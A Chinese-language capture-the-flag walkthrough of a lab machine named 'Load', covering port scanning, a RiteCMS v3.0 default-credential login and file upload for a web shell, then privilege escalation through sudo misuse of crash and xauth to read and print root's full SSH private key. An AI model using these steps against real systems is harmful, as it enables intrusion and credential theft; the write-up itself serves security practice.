# 靶场搭建
下载:Load
Nat,IP: 192.168.1.130
# 渗透过程
# 信息初收集
PORT STATE SERVICE VERSION | |
22/tcp open ssh OpenSSH 9.2p1 Debian 2+deb12u2 (protocol 2.0) | |
| ssh-hostkey: | |
| 256 a9:a8:52:f3:cd:ec:0d:5b:5f:f3:af:5b:3c:db:76:b6 (ECDSA) | |
|_ 256 73:f5:8e:44:0c:b9:0a:e0:e7:31:0c:04:ac:7e:ff:fd (ED25519) | |
80/tcp open http Apache httpd 2.4.57 ((Debian)) | |
|_http-title: Apache2 Debian Default Page: It works | |
| http-robots.txt: 1 disallowed entry | |
|_/ritedev/ | |
|_http-server-header: Apache/2.4.57 (Debian) |
robots.txt 里面有 /ritedev/ ,打开是个 RiteCMS version v3.0
直接搜出来 exp
# 漏洞利用
一个文件上传,看到地址是 admin.php,访问一下,直接弱口令 admin:admin,进入后台
找到文件上传点,按照 file 上传 shell,拿到 shell: http://192.168.1.130/ritedev/files/shell.php ,访问反弹 shell
# 提权
sudo -u travis crash -h | |
!sh |
拿到 travis 的 shell
travis@load:/$ sudo xauth source /root/.ssh/id_rsa | |
### 处理一下 | |
┌──(root㉿kali)-[~] | |
└─# cat id_rsa | |
-----BEGIN RSA PRIVATE KEY-----` | |
MIIEpAIBAAKCAQEAn1xk2mDBXCTen7d97aY7rEVweRUsVE5Zl4sGPG/yXLAAuodz | |
xjGuAqvTRhG4omhxiJeDr9taOePsIaUGI3Q/qBqUsbnuM/86vu/ANM6+Olzt80fc | |
Cv1QVKIdFOweMAiXskvQEV7Fw3qha7fFbf/D8L7BCgXrT70/p9jf4FBroC9pFsRy | |
6i7CFxcAfji+OeGu5ezhL21uwkTk22vmnBL1hAqn7p2vOmzg57UkP1VAN819oBLS | |
YUKsCrgjKsdQsFCef9lyFty8Dxpmfwg5t0MmLhA/uhDjvQD9k9cR95+Ru5mV467B | |
kGad73SHXTHWh9gy0iunAMMveUiEf/qWw2qo8QIDAQABAoIBAARD2sclc8ddjT/F | |
D2++1TYFHb9/25HeDvPJWr9fV6M3aq2TVnvldHzJ0Hu9ma1vEirPs0yPmFiYSweT | |
fRiR0epT28rt6PwnRpE5pXFEXz78obmzIKaCpRW+yPx4XU53zGePM+BjIvPaYluZ | |
rYUGJV5aHJyCEAwwSnXZjhRY0qiU0Tt8VWtwoaltImiNoc9yA7cbWOJcmv4g+YHy | |
2ce4xb7DAZFf0p7kVLEL2jvaYImUCT12rIo01+q1z9pntW9Y+1JqVIqkGMNITFEf | |
th3cea9fuhVxiAMIj9xLd8uG6/qUAU8ITjRZwOorJJwqwkaTWdxJq8D6+1UBEGyC | |
sRXtk8kCgYEA9f2uC7+mDRDWdr2rCaL5hY3XiqNp+PINgYwWm5ELriZORrXV6PwZ | |
AIuK7vwoNk7+MkGtveK2GwEocIZMipdnTyIBeaGUExBBgIE16IxIQaDw/zi93PVD | |
BoJ5uK+N5pCVQ67VFNfyDoiZn2EbA8pWXAKJMIJUnRpb4o5306grfiMCgYEApdhZ | |
He5k7xrccGbu20FnjeMqpfzDVeN8n06ycz4H8L0UMeC22Dy6r/6tFhJWuVmxZpa+ | |
sbPEAqc6q+WjXzFe2YZ4Fhcyj/t7QXEenWrSF6gQJvBN2glWNWkIrvTFjcI5wY/7 | |
ECoDHdzGprLpziq73Ukimk2TmRYur7mYIU0Qy9sCgYEAqnif6eJph7p4dZdhdW8s | |
7oHqslgm82+DLpjPfgWZi5leO6B92lUCWp9Zq96xW1mIzXk4l1QKkVJPHRPk7VKZ | |
NHzDevAftspYKl7g5gR5eom3GZfP89VAGr3G7tcyRmtCFcKORkCUrb+6fnoEB69s | |
A516R1S6oJkIvkuu/M4ZPfMCgYBk4Ca8rP/Z7FW/TOzmkm7hgBa15fwOpxNrdxvW | |
OxnrVacN+6hb+Px5BojTjw4PKb5dLz4IqtaD4qIuYryvr0EJQOCUV0HbEFVVZfAA | |
QjROTVydwrcn81vrmtq8SIhNhKFK2kAVAejpZhuy08qhK58fp1eT0bIAgNye6F3f | |
i5e21wKBgQDDCQhaWuW5A5xF4N7obHX9HWgdfNLEABfub2Ysu9xLXdW5lhKxfVsZ | |
JAavd3wkMRXHLIOQtOiV9z3F2PmbO3h6yR6esFl0tGcnfZYmaiZJN/MLZKpL9WI/ | |
WuTyDRk99zQu4GNenQiUDmxYCuOuX5kggXaakAN98THXncO38BAAiA== | |
-----END RSA PRIVATE KEY----- |
登录拿到 root 权限
